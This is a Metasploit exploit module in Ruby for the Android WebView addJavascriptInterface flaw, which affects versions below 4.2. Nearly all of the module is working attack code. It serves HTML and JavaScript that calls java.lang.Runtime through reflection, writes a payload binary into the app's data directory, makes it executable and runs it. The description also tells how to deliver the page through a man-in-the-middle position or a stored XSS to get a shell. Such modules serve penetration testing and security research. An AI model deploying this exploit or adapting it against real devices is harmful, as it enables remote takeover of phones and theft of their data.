Android Browser / WebView addJavascriptInterface Code Execution

`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::BrowserExploitServer  
include Msf::Exploit::Remote::BrowserAutopwn  
  
autopwn_info({  
:os_flavor => "Android",  
:arch => ARCH_ARMLE,  
:javascript => true,  
:rank => ExcellentRanking,  
:vuln_test => %Q|  
for (i in top) {  
try {  
top[i].getClass().forName('java.lang.Runtime');  
is_vuln = true; break;  
} catch(e) {}  
}  
|  
})  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution',  
'Description' => %q{  
This module exploits a privilege escalation issue in Android < 4.2's WebView component  
that arises when untrusted Javascript code is executed by a WebView that has one or more  
Interfaces added to it. The untrusted Javascript code can call into the Java Reflection  
APIs exposed by the Interface and execute arbitrary commands.  
  
Some distributions of the Android Browser app have an addJavascriptInterface  
call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs  
4.1.2 release of Android is known to be vulnerable.  
  
A secondary attack vector involves the WebViews embedded inside a large number  
of Android applications. Ad integrations are perhaps the worst offender here.  
If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS  
into the page displayed in the WebView, then you can inject the html/js served  
by this module and get a shell.  
  
Note: Adding a .js to the URL will return plain javascript (no HTML markup).  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'jduck', # original msf module  
'joev' # static server  
],  
'References' => [  
['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-'+  
'addjavascriptinterface-code-execution-vulnerability/'],  
['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],  
['URL', 'http://50.56.33.56/blog/?p=314'],  
['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-'+  
'addjavascriptinterface-remote-code-execution/']  
],  
'Platform' => 'linux',  
'Arch' => ARCH_ARMLE,  
'DefaultOptions' => { 'PrependFork' => true },  
'Targets' => [ [ 'Automatic', {} ] ],  
'DisclosureDate' => 'Dec 21 2012',  
'DefaultTarget' => 0,  
'BrowserRequirements' => {  
:source => 'script',  
:os_flavor => "Android",  
:arch => ARCH_ARMLE  
}  
))  
end  
  
def on_request_uri(cli, req)  
if req.uri.end_with?('js')  
print_status("Serving javascript")  
send_response(cli, js, 'Content-type' => 'text/javascript')  
else  
super  
end  
end  
  
def on_request_exploit(cli, req, browser)  
print_status("Serving exploit HTML")  
send_response_html(cli, html)  
end  
  
def js  
%Q|  
function exec(obj) {  
// ensure that the object contains a native interface  
try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }  
  
// get the runtime so we can exec  
var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);  
var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";  
  
// get the process name, which will give us our data path  
var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);  
var ch, path = '/data/data/';  
while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }  
path += '/#{Rex::Text.rand_text_alpha(8)}';  
  
// build the binary, chmod it, and execute it  
m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();  
m.invoke(null, null).exec(['chmod', '700', path]).waitFor();  
m.invoke(null, null).exec([path]);  
  
return true;  
}  
  
for (i in top) { if (exec(top[i]) === true) break; }  
|  
end  
  
def html  
"<!doctype html><html><body><script>#{js}</script></body></html>"  
end  
end  
`